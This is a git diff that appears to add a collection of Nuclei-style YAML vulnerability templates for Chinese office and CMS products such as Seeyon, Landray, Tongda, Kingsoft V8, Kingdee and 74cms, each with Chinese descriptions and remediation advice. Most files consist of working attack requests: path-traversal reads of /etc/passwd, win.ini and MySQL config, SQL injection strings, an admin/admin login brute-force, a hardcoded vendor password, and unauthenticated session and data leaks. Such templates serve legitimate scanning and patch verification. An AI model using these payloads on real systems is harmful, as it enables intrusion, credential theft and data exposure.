contains(body_3,'Session') && contains(body_3,'sessionID') + - status_code_4==200 && contains(body_4,'localhost') && contains(body_4,'new root') + path: + - '{{BaseURL}}/yyoa/common/selectPersonNew/initData.jsp?trueName=1' + - '{{BaseURL}}/yyoa/createMysql.jsp' + - '{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll' + - '{{BaseURL}}/yyoa/ext/createMysql.jsp' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0157458.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0157458.yaml" new file mode 100755 index 000000000..eda492724 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2015-0157458.yaml" @@ -0,0 +1,51 @@ +id: wooyun-2015-0157458 +info: + name: 致远A8协同系统敏感信息泄露2处 + author: + - 折跃 + description: |- + 致远A8协同系统敏感信息泄露漏洞 + 致远A8协同管理软件是面向中高端企业、科研机构、政府机关和事业单位、涉外组织等可批量交付的协同办公软件。 + + 致远A8存在敏感信息泄露漏洞,攻击者可通过此漏洞获取系统敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - regex("\d{2}\:\d{2}\:\d{2}(.*),\s?((?:\d{1,3}\.){3}\d{1,3})",body) + path: + - '{{BaseURL}}/seeyon//logs/login.log' + - '{{BaseURL}}/logs/login.log' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code==302 + - contains(all_headers,"seeyon/management/status.jsp") + path: + - '{{BaseURL}}/seeyon/management/index.jsp' + - '{{BaseURL}}/management/index.jsp' + method: POST + body: password=WLCCYBD@SEEYON + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2016-0170297.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2016-0170297.yaml" new file mode 100755 index 000000000..0a46e6cd3 --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/wooyun-2016-0170297.yaml" @@ -0,0 +1,36 @@ +id: wooyun-2016-0170297 +info: + name: 致远OA_A6_DownExcelBeanServlet 员工信息泄露漏洞 + author: + - 折跃 + description: |- + 用友致远A6 员工信息泄露漏洞 + 用友致远A6协同管理系统是一个基于互联网的高效协同工作平台和优秀的协同管理系统。 + + 用友致远A6存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.seeyon.com/ + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(all_headers,'filename') + - contains(all_headers,'.xls') + path: + - '{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-file-upload.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-file-upload.yaml" new file mode 100755 index 000000000..4b8309bfc --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-file-upload.yaml" @@ -0,0 +1,34 @@ +id: zhiyuan-file-upload +info: + name: Zhiyuan OA Arbitrary File Upload Vulnerability + author: + - gy741 + tags: + - zhiyuan + - rce + - upload + description: |- + 致远OA-ajax.do任意文件上传漏洞 + 由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。 + reference: + - https://www.programmersought.com/article/92658169875/ + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁,致远OA官方已针对该漏洞提供补丁,鉴于漏洞危害较大,建议用户尽快应用补丁更新。 +requests: +- matchers: + - type: word + words: + - java.lang.NullPointerException:null + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do' + method: GET diff --git "a/config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-oa-unauthorized.yaml" "b/config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-oa-unauthorized.yaml" new file mode 100755 index 000000000..b3cec881c --- /dev/null +++ "b/config/51pwn/yaml/\350\207\264\350\277\234OA/zhiyuan-oa-unauthorized.yaml" @@ -0,0 +1,36 @@ +id: zhiyuan-oa-unauthorized +info: + name: Zhiyuan Oa Unauthorized + author: + - pikpikcu + tags: + - seeyon + - unauth + - zhiyuan + description: |- + 致远OA未授权访问漏洞 + 由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,导致攻击者可以通过构造恶意请求,在无需登录的情况下上传恶意脚本文件,从而控制服务器。 + reference: + - https://buaq.net/go-53721.html + severity: low + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁,致远OA官方已针对该漏洞提供了相关修复补丁。 +requests: +- matchers: + - type: word + condition: and + words: + - serverIdentifier + - companyName + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile' + method: GET diff --git "a/config/51pwn/yaml/\350\223\235\345\207\214OA/CNVD-2021-28277.yaml" "b/config/51pwn/yaml/\350\223\235\345\207\214OA/CNVD-2021-28277.yaml" new file mode 100755 index 000000000..4fa4221cf --- /dev/null +++ "b/config/51pwn/yaml/\350\223\235\345\207\214OA/CNVD-2021-28277.yaml" @@ -0,0 +1,49 @@ +id: CNVD-2021-28277 +info: + name: 蓝凌OA custom.jsp 任意文件读取漏洞 + author: + - l0ne1y + description: |- + 蓝凌OA custom.jsp 任意文件读取漏洞 + 蓝凌oa办公系统是用于即时办公通讯的oa办公工具。 + + 蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.landray.com.cn/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + condition: or + regex: + - 'root:.*:0:0:' + - for 16-bit app support + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"file:///etc/passwd"}} + - | + POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + var={"body":{"file":"file:///c://windows/win.ini"}} + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\351\200\232\350\276\276OA/Tongda-OA-FileInclude.yaml" "b/config/51pwn/yaml/\351\200\232\350\276\276OA/Tongda-OA-FileInclude.yaml" new file mode 100755 index 000000000..70c03d36b --- /dev/null +++ "b/config/51pwn/yaml/\351\200\232\350\276\276OA/Tongda-OA-FileInclude.yaml" @@ -0,0 +1,41 @@ +id: Tongda-OA-FileInclude +info: + name: 通达OA任意文件包含 + author: + - l0ne1y + tags: + - tongda + - lfi + description: |- + 通达OA任意文件包含 + 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。 + reference: + - /~https://github.com/jas502n/oa-tongda-rce + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + condition: and + part: header + words: + - text/html + - type: word + condition: and + part: body + words: + - '[mysql]' + - password= + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /ispirit/interface/gateway.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + json={"url":"/general/../../mysql5/my.ini"} diff --git "a/config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-meeting-unauthorizedAccess.yaml" "b/config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-meeting-unauthorizedAccess.yaml" new file mode 100755 index 000000000..97f8857bd --- /dev/null +++ "b/config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-meeting-unauthorizedAccess.yaml" @@ -0,0 +1,36 @@ +id: tongda-meeting-unauthorizedAccess +info: + name: tongda-meeting-unauthorized-access + author: + - l0ne1y + description: |- + 通达OA未授权访问导致敏感信息泄露 + 攻击者可利用该漏洞获取网站敏感信息,在Web程序中由于权限控制不当,导致用户可以访问或操作到本身没有权限访问的数据即使越权访问。 + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - creator + - originalTitle + - type: word + condition: and + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay' + method: GET + headers: + Accept-Encoding: deflate + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like + Gecko) Chrome/62.0.3202.9 Safari/537.36 diff --git "a/config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-session-disclosure.yaml" "b/config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-session-disclosure.yaml" new file mode 100755 index 000000000..04c486e54 --- /dev/null +++ "b/config/51pwn/yaml/\351\200\232\350\276\276OA/tongda-session-disclosure.yaml" @@ -0,0 +1,32 @@ +id: tongda-session-disclosure +info: + name: Tongda User Session Disclosure + author: + - l0ne1y + description: |- + 通达OA v11.7 在线用户登录漏洞 + 在Web程序中由于权限控制不当,导致用户可以访问或操作到本身没有权限访问的数据即使越权访问,通达OA v11.7 中存在某接口可在未授权情况下查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。 + severity: medium + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"dept_name":"' + - '"online_flag":' + - type: word + condition: and + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/general/userinfo.php?UID=1' + method: POST diff --git "a/config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-default-login.yaml" "b/config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-default-login.yaml" new file mode 100755 index 000000000..2c568ef83 --- /dev/null +++ "b/config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-default-login.yaml" @@ -0,0 +1,49 @@ +id: kingsoft-v8-default-login +info: + name: Kingsoft V8 Default Login + author: + - l0ne1y + tags: + - kingsoft + - default-login + description: |- + 金山V8 终端安全系统弱口令漏洞 + 金山V8 终端安全系统是新一代企业终端安全软件,该产品可动态检测、实时处理、全网追溯用户网络中的未知威胁,满足国内企业用户日益复杂的含PC、移动、虚拟桌面在内的多类终端安全防护需求。 + + 金山V8 终端安全系统存在默认弱口令账户。 + reference: + - https://idc.wanyunshuju.com/aqld/2123.html + severity: medium + remediation: |- + 修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: body + words: + - ADMIN + - userSession + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 + Host: {{Hostname}} + + {"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}} + attack: pitchfork + payloads: + password: + - admin + username: + - admin + max-redirects: 2 + redirects: true diff --git "a/config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-file-read.yaml" "b/config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-file-read.yaml" new file mode 100755 index 000000000..c42df1ed9 --- /dev/null +++ "b/config/51pwn/yaml/\351\207\221\345\261\261V8+\347\273\210\347\253\257\345\256\211\345\205\250\347\263\273\347\273\237/kingsoft-v8-file-read.yaml" @@ -0,0 +1,41 @@ +id: kingsoft-v8-file-read +info: + name: Kingsoft V8 File Read + author: + - l0ne1y + description: |- + 金山V8 终端安全系统 downfile.php 任意文件读取漏洞 + 金山V8 终端安全系统是新一代企业终端安全软件,该产品可动态检测、实时处理、全网追溯用户网络中的未知威胁,满足国内企业用户日益复杂的含PC、移动、虚拟桌面在内的多类终端安全防护需求。 + + 金山V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.ejinshan.net/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - for 16-bit app support + - '[extensions]' + - type: word + part: header + words: + - application/zip + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/htmltopdf/downfile.php?filename=/windows/win.ini' + method: GET diff --git "a/config/51pwn/yaml/\351\207\221\350\235\266OA/kingdee-eas-DirectoryTraversal.yaml" "b/config/51pwn/yaml/\351\207\221\350\235\266OA/kingdee-eas-DirectoryTraversal.yaml" new file mode 100755 index 000000000..acf29b0ff --- /dev/null +++ "b/config/51pwn/yaml/\351\207\221\350\235\266OA/kingdee-eas-DirectoryTraversal.yaml" @@ -0,0 +1,40 @@ +id: kingdee-eas-DirectoryTraversal +info: + name: 金蝶OA server_file 目录遍历漏洞 + author: + - ritikchaddha + description: |- + 金蝶OA server_file 目录遍历漏洞 + 金蝶软件(中国)有限公司经营范围包括:生产、开发、经营电脑软硬件、技术培训及信息方面的咨询服务等。 + + 金蝶OA server_file 存在目录遍历漏洞,攻击者通过目录遍历可以获取服务器敏感信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.kingdee.com/ + + 临时修复方案: + 1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符等。 + 2、限制可访问路径 +requests: +- matchers: + - type: word + condition: or + part: body + words: + - '{"name":"Windows","path":"C:\\\\Windows","folder":true}' + - '{"name":"root","path":"/root","folder":true}' + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix=' + - '{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix=' + method: GET + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\351\230\277\351\207\214 Druid \346\225\260\346\215\256\345\272\223\350\277\236\346\216\245\346\261\240/druid-console-exposure.yaml" "b/config/51pwn/yaml/\351\230\277\351\207\214 Druid \346\225\260\346\215\256\345\272\223\350\277\236\346\216\245\346\261\240/druid-console-exposure.yaml" new file mode 100755 index 000000000..9f9656b72 --- /dev/null +++ "b/config/51pwn/yaml/\351\230\277\351\207\214 Druid \346\225\260\346\215\256\345\272\223\350\277\236\346\216\245\346\261\240/druid-console-exposure.yaml" @@ -0,0 +1,23 @@ +id: druid-console-exposure +info: + name: Alibaba Druid Console Exposure + author: + - l0ne1y + description: |- + Alibaba Druid控制台暴漏 + Druid是Java语言中最好的数据库连接池。Druid能够提供强大的监控和扩展功能。通过druid.js或druid.css可能获得Druid控制台信息 + severity: low + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/alibaba/druid/ +requests: +- matchers: + - type: word + condition: and + words: + - src="/druid.js" + - href="/druid.css" + path: + - '{{BaseURL}}' + method: GET diff --git "a/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-1.yaml" "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-1.yaml" new file mode 100755 index 000000000..eb119d1c5 --- /dev/null +++ "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-1.yaml" @@ -0,0 +1,41 @@ +id: 74cms-SQLi-1 +info: + name: 74cms Sql Injection + author: + - l0ne1y + description: |- + 迅易科技 74cms SQL注入漏洞 + 迅易科技 74cms是广州迅易科技有限公司的一套基于PHP和MySQL的在线招聘系统。 + + 迅易科技 74cms中存在SQL注入漏洞。该漏洞源于缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 + severity: high + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.74cms.com + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - contains(body,verify) && !regex('select.*?{{verify}}',body) + path: + - '{{BaseURL}}/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=' + method: POST + body: ]>&test;111112331%' + union select {{verify}}# + headers: + Content-Type: text/xml +variables: + verify: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-2.yaml" "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-2.yaml" new file mode 100755 index 000000000..a91c9dbcf --- /dev/null +++ "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-SQLi-2.yaml" @@ -0,0 +1,36 @@ +id: 74cms-SQLi-2 +info: + name: 74cms Sql Injection + author: + - l0ne1y + description: |- + 迅易科技 74cms SQL注入漏洞 + 迅易科技 74cms是广州迅易科技有限公司的一套基于PHP和MySQL的在线招聘系统。 + + 迅易科技 74cms中存在SQL注入漏洞。该漏洞源于缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 + severity: high + remediation: |- + 官方修复方案: + 1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.74cms.com + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,verify) && regex('sel.*?ect.*?{{verify}}',body) + matchers-condition: and + path: + - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,{{verify}},5,6,7,8,9%23' + method: GET +variables: + verify: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-front-desk-getshell.yaml" "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-front-desk-getshell.yaml" new file mode 100755 index 000000000..48a88aadf --- /dev/null +++ "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/74cms-front-desk-getshell.yaml" @@ -0,0 +1,39 @@ +id: 74cms-front-desk-getshell +info: + name: 74cms-front-desk-getshell + author: + - jim2g + description: | + 74cms-front-desk-getshell文件上传漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c22a46bb7b016f8a8c3357e2f22ff21d') + raw: + - | + GET /index.php?m=&c=M&a=index&type=../favicon.ico HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git "a/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/CVE-2020-22210.yaml" "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/CVE-2020-22210.yaml" new file mode 100755 index 000000000..8bfc3e9f4 --- /dev/null +++ "b/config/51pwn/yaml/\351\252\221\345\243\253CMS\357\274\21074CMS\357\274\211/CVE-2020-22210.yaml" @@ -0,0 +1,35 @@ +id: CVE-2020-22210 +info: + name: 74cms Sql Injection + author: + - l0ne1y + description: |- + 迅易科技 74cms SQL注入漏洞 + 迅易科技 74cms是广州迅易科技有限公司的一套基于PHP和MySQL的在线招聘系统。 + + 74cms 3.2.0 存在SQL注入漏洞,该漏洞源于officebuilding.php的x参数注入。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/blindkey/cve_like/issues/11 + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: body + words: + - e807f1fcf82d132f9bb018ca6738a19f + path: + - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") + and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' + method: GET diff --git "a/config/51pwn/yaml/\351\275\220\345\215\232CMS/Qibocms-SQLi.yaml" "b/config/51pwn/yaml/\351\275\220\345\215\232CMS/Qibocms-SQLi.yaml" new file mode 100755 index 000000000..364b44bf7 --- /dev/null +++ "b/config/51pwn/yaml/\351\275\220\345\215\232CMS/Qibocms-SQLi.yaml" @@ -0,0 +1,32 @@ +id: Qibocms-SQLi +info: + name: Qibocms SQLinjection + author: + - l0ne1y + description: |- + 齐博CMS整站系统V7.0后台存在SQL注入漏洞 + 齐博CMS整站系统是广州齐博网络科技有限公司旗下的一套开源的内容管理系统。 + + 齐博CMS V7.0后台存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:http://www.qibosoft.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - '!contains(body,"SELECT%25201%2C2%2C3%2C4%2C5%2C6%2C") && contains(body,randstr)' + path: + - '{{BaseURL}}/f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,{{randstr}},9,10,11,12,13,14,15,16,17,18,19%23' + method: GET diff --git 